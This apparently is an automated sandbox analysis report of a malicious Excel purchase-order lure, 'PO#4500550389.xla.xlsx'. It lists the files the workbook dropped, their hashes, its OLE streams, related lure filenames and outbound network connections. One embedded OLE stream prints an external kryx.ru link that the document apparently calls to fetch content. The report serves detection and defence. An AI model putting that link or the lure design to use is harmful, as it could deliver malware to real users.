                                        • 13.76.184.174
                                        hgfs.arm.elfGet hashmaliciousUnknownBrowse
                                        • 52.173.237.73
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        258a5a1e95b8a911872bae9081526644New order 242.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        #U0437#U0430#U043a#U0430#U0437#U0430_03M4138.docx.docGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        Our Order.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        FORMULARZ ODPRAWY CELNEJ DHL.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        Account statement Payment release.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        No context
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):118
                                        Entropy (8bit):3.5700810731231707
                                        Encrypted:false
                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                        MD5:573220372DA4ED487441611079B623CD
                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20971520
                                        Entropy (8bit):8.112143835430977E-5
                                        Encrypted:false
                                        SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                                        MD5:AFDEAC461EEC32D754D8E6017E845D21
                                        SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                                        SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                                        SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20971520
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                        SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                        SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                        SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):71
                                        Entropy (8bit):4.3462513114457515
                                        Encrypted:false
                                        SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                                        MD5:8F4510F128F81A8BAF2A345D00F7E30C
                                        SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                                        SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                                        SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                                        Malicious:false
                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:ASCII text, with very long lines (28720), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):20971520
                                        Entropy (8bit):0.21800675974525263
                                        Encrypted:false
                                        SSDEEP:1536:MWtfm4Hr9ZlZhlw9/+t9/QQhomhlPbYxC+W9xxOCto+ZOmjs4a3JpBY05ZT7MFRn:rPHvRxOUZOiY5Zx2FYBO/45aG
                                        MD5:164A4C667A2B5A22A9E86FD987736164
                                        SHA1:B5647F5273D9ADF57146F99831B14934EFB272F6
                                        SHA-256:FC72523474E085065FE3561572ED58214E44C67F56901F5E2EE4E1864DBC45F3
                                        SHA-512:948665CA879D35D6B38F442D6F0A01C3197FAD9091E9ED8641E05879CBC7CADE9C8B23DFC043496C8FF22235165A3BEAE7112223F51809B3DBB708671A847145
                                        Malicious:false
                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/17/2025 08:41:59.607.EXCEL (0x146C).0x37C.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-03-17T08:41:59.607Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-17T08:41:59.1075038Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-17T08:41:59.1075038Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-17T08:41:59.1075038Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20971520
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                        SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                        SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                        SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:ASCII text, with very long lines (28828), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):262824
                                        Entropy (8bit):5.152697990380378
                                        Encrypted:false
                                        SSDEEP:1536:CNP7VXyBojCeoOWFFOT3XEGWEBhjQXT9VSGJ56LBvstjhkjHNFH8BBuVt/4Vqpal:MzV9oOaY3XEd2FYBO/i0e
                                        MD5:AC44C6CD951A360B3251A7E4C2DB834F
                                        SHA1:15BB7F6F51CE30D6C39F6E629E21CE2058468A70
                                        SHA-256:12AD142796890A3F79C468EEBA2F235529700BB3D4723D40F78E773241926090
                                        SHA-512:0558BF0BE1530D496F005BD92F2C10BD13F2F614F88B6CB8F99151CC49CAAB30F0825A8AA59F532B8D97FC75B1D7F5B3166CDB032E3A774792A8E4BB4CF836C8
                                        Malicious:false
                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/17/2025 08:43:15.108.EXCEL (0x8C0).0xFC0.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":19,"Time":"2025-03-17T08:43:15.108Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-17T08:43:14.8118758Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-17T08:43:14.8118758Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-17T08:43:14.8118758Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N\
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):662528
                                        Entropy (8bit):7.982013203126156
                                        Encrypted:false
                                        SSDEEP:12288:RUCec9/QlJ3e10bEuhJEqDcKvF0Mx8CSHkfJ08pzb2wswYl6IU5cqH:Rjec9olNd3hR96CBJfpHjBYGu
                                        MD5:697F18C58B8E126B7585C592C2EF0584
                                        SHA1:B128F477388DD6F9E9530434B87639F56F120DDA
                                        SHA-256:94BE231F56D93E7E456C13813C620AFD2C8375429E83DF751646BC558EBCBB91
                                        SHA-512:B4EFF2A17552DA9BB67FA8EBD67E34C59DF438C88AD1C5BA0F22B03C666858B40EF2CC4B34D636A8219470893C9ADF45A3A7C719BE8481FD5775D8F213AC1D49
                                        Malicious:false
                                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):671744
                                        Entropy (8bit):7.931241234859872
                                        Encrypted:false
                                        SSDEEP:12288:lUCec9/QlJ3e10bEuhJEqDcKvF0Mx8CSHkfJ08pzb2wswYl6IU5cqH:ljec9olNd3hR96CBJfpHjBYGu
                                        MD5:6E532C6F4FDBC4005D4322667D05FEED
                                        SHA1:080D54DC8778CE5D3C91B05CC876C7E9B850218A
                                        SHA-256:6FFA9D67C6133EC28FF20DCD65894D39C8E0FD40BAB5EC1702FDA54F13DA04A6
                                        SHA-512:2A4A9C9A23ED6A07C04C850F1A596BFF1570D9FCCA059AB91385E720E7F4B1577A343A353ED361B2B1A9CAF66A49E6FFFF860174C91CB0523E71BE1BDFC9DFD5
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 17 08:43:12 2025, Security: 1
                                        Category:dropped
                                        Size (bytes):1256960
                                        Entropy (8bit):7.98963587902483
                                        Encrypted:false
                                        SSDEEP:24576:djec9olNd3hR96CBJfpHjBYGusBRtrq4vocNDglX7Y8e5Bf/Q:VeOKHdVg2oBY8e5Bf4
                                        MD5:AE93C8AEE768EA0A7417ED713B58DF16
                                        SHA1:193C703EC7D2D9CB4685CFE11FE1841C40C6BB61
                                        SHA-256:478257BF7F97932F7FB8DF4E543686DE848EB5A4F38B50EEC3ADE75554739CFE
                                        SHA-512:A236C27F5C93D9E190460EF6904F410C6FEE38FC8C1AF033599A1090996747680175179DCA6C451BBF1264EB1858674387B003BC95B444B0C781C5CBA6DEF41E
                                        Malicious:false
                                        Preview:......................>...............................................................................................m.......o.......q.......s.......u................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 17 08:43:12 2025, Security: 1
                                        Category:dropped
                                        Size (bytes):1256960
                                        Entropy (8bit):7.98963587902483
                                        Encrypted:false
                                        SSDEEP:24576:djec9olNd3hR96CBJfpHjBYGusBRtrq4vocNDglX7Y8e5Bf/Q:VeOKHdVg2oBY8e5Bf4
                                        MD5:AE93C8AEE768EA0A7417ED713B58DF16
                                        SHA1:193C703EC7D2D9CB4685CFE11FE1841C40C6BB61
                                        SHA-256:478257BF7F97932F7FB8DF4E543686DE848EB5A4F38B50EEC3ADE75554739CFE
                                        SHA-512:A236C27F5C93D9E190460EF6904F410C6FEE38FC8C1AF033599A1090996747680175179DCA6C451BBF1264EB1858674387B003BC95B444B0C781C5CBA6DEF41E
                                        Malicious:false
                                        Preview:......................>...............................................................................................m.......o.......q.......s.......u................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4134958568691696
                                        Encrypted:false
                                        SSDEEP:3:D//nEwmM:DXEwmM
                                        MD5:8B6F49EF043D1AF562C216108A13E0F2
                                        SHA1:0106337F6D46E83B30CA7C1563C3FC3AF4209AF3
                                        SHA-256:C80D5433620A06CF252C9489F9A46BA091A5DAA239AAC3A98DB918627DEFF314
                                        SHA-512:241592FDA43D686AF92D22B2B451C51E70B742A5C33FA94307613155906396A53501E05719DD568C3D3C8088B95B83D7E98393B3692EB4B01907FE8BD927E896
                                        Malicious:true
                                        Preview:.user ..M.a.o.g.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 17 05:45:47 2025, Security: 1
                                        Entropy (8bit):7.98997085995464
                                        TrID:
                                        • Microsoft Excel sheet (30009/1) 78.94%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                        File name:PO#4500550389.xla.xlsx
                                        File size:1'318'912 bytes
                                        MD5:9395f29bf9aa98cdfc7be58656b0c436
                                        SHA1:bb011d3f299d379fe2e55fb9afc34ed29b89f484
                                        SHA256:45971f014df6d607611e96131089cf154c8842aa2154bd8382badf844dbe96b1
                                        SHA512:51ff64ef30795dd1f8a9bb3299e3818c06d04cf11df9bac73f2edd902aa45d23c9a473a8406fc9d7a9ba1fea1bcdfb2220a124d8a6277214792fdb587f1bc11e
                                        SSDEEP:24576:DeFTQS093d6OBMlvDvZR3ogYaGW8J9Hi82vfaCgeg5qCsXD7aeC:K3093d60XeGXW1gr5AXDOe
                                        TLSH:7255231AAA805737E19F5374092B407E0939DC4EB92BBC06999CF53633F13F62AD3649
                                        File Content Preview:........................>...................................V...........................................................Y.......{.......}...............a......................................................................................................
                                        Icon Hash:35e58a8c0c8a85b9
                                        Document Type:OLE
                                        Number of OLE Files:1
                                        Has Summary Info:
                                        Application Name:Microsoft Excel
                                        Encrypted Document:True
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:True
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:False
                                        Flash Objects Count:0
                                        Contains VBA Macros:False
                                        Code Page:1252
                                        Author:
                                        Last Saved By:
                                        Create Time:2006-09-16 00:00:00
                                        Last Saved Time:2025-03-17 05:45:47
                                        Creating Application:Microsoft Excel
                                        Security:1
                                        Document Code Page:1252
                                        Thumbnail Scaling Desired:False
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:786432
                                        General
                                        Stream Path:\x1CompObj
                                        CLSID:
                                        File Type:data
                                        Stream Size:114
                                        Entropy:4.25248375192737
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        CLSID:
                                        File Type:data
                                        Stream Size:244
                                        Entropy:2.889430592781307
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                        General
                                        Stream Path:\x5SummaryInformation
                                        CLSID:
                                        File Type:data
                                        Stream Size:200
                                        Entropy:3.2920681057018664
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . w . . . . . . . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                        General
                                        Stream Path:MBD00D3132E/\x1CompObj
                                        CLSID:
                                        File Type:data
                                        Stream Size:99
                                        Entropy:3.631242196770981
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                        General
                                        Stream Path:MBD00D3132E/Package
                                        CLSID:
                                        File Type:Microsoft Excel 2007+
                                        Stream Size:692551
                                        Entropy:7.992424429220616
                                        Base64 Encoded:True
                                        Data ASCII:P K . . . . . . . . . . ! . 9 | . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 db 39 7c be ae 01 00 00 0e 06 00 00 13 00 d4 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d0 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        General
                                        Stream Path:MBD00D3132F/\x1Ole
                                        CLSID:
                                        File Type:data
                                        Stream Size:886
                                        Entropy:5.39573268809116
                                        Base64 Encoded:False
                                        Data ASCII:. . . . q ` ( . Q . . . . . . . . . . . . n . . . y . . . K . j . . . h . t . t . p . s . : . / . / . k . r . y . x . . . r . u . / . e . 3 . E . P . l . 0 . ? . & . b . i . r . d . c . a . g . e . = . l . o . n . g . & . m . a . i . l . = . s . u . p . e . r . & . h . e . l . i . u . m . = . h . e . a . r . t . b . r . e . a . k . i . n . g . & . s . u . p . p . o . r . t . . . . v N . s V h n & 2 . . s . = . T . E Q \\ ' i . h . x 5 . r , . F u 3 a o . . ; . 5 . & . \\ 7 5 j j ( ] B f . . _ J . J . k U
                                        Data Raw:01 00 00 02 71 cd c8 60 c9 28 16 51 00 00 00 00 00 00 00 00 00 00 00 00 6e 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 6a 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6b 00 72 00 79 00 78 00 2e 00 72 00 75 00 2f 00 65 00 33 00 45 00 50 00 6c 00 30 00 3f 00 26 00 62 00 69 00 72 00 64 00 63 00 61 00 67 00 65 00 3d 00 6c 00 6f 00 6e 00 67 00 26 00 6d 00 61 00
                                        General
                                        Stream Path:Workbook
                                        CLSID:
                                        File Type:Applesoft BASIC program data, first line number 16
                                        Stream Size:610391
                                        Entropy:7.99946707998373
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . ] 5 . . Y & ( h p . . ' . . ^ H D | ! . T . . S . . . . . . . . . . . M * . . . \\ . p . < x 1 3 . . . . . \\ > k r D Y 5 4 . V . Q h 2 . . . 4 . > : . e D _ . . . N P W 0 . P . B . H . O s . L . n ! . j . i B . . . . . a . . . D . . . = . . . . . . . . ? c i & N N I . 8 . . . . v . . . . . . . . . . . . . h . . . . . . . . ! = . . . % V . b . . ) o . ^ @ . . . ( . . . . " . . . . K . . . . U . . . . . . . % 1 . . . O / . p . v . . O $ ( + . 1 . . . #
                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 1a 5d d3 cf 35 d4 d8 9c 06 59 f2 26 fd 28 68 fb b7 70 cc 89 d6 1f 27 8d 95 b9 db 97 d4 0d 81 5e 48 b6 44 7c 94 21 1a 54 de 8e 1a 53 c2 c8 99 f4 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 4d 2a e2 00 00 00 5c 00 70 00 3c 8c 78 c4 ed ae bb 31 33 ce ad fb e8 d8 a0 d3 05 1e bb 0a a6 d7 5c 3e 6b d1
                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 17, 2025 09:42:34.145075083 CET5521553192.168.2.24162.159.36.2
                                        Mar 17, 2025 09:42:34.150626898 CET5355215162.159.36.2192.168.2.24
                                        Mar 17, 2025 09:42:34.150759935 CET5521553192.168.2.24162.159.36.2
                                        Mar 17, 2025 09:42:34.156388044 CET5355215162.159.36.2192.168.2.24
                                        Mar 17, 2025 09:42:34.609970093 CET5521553192.168.2.24162.159.36.2
                                        Mar 17, 2025 09:42:34.653362036 CET5355215162.159.36.2192.168.2.24
                                        Mar 17, 2025 09:42:34.653423071 CET5521553192.168.2.24162.159.36.2
                                        Mar 17, 2025 09:42:51.463613033 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:51.463654995 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:51.463743925 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:51.464685917 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:51.464699984 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.169289112 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.169373035 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.170799017 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.170825958 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.171952009 CET44355218188.225.72.170192.168.2.24
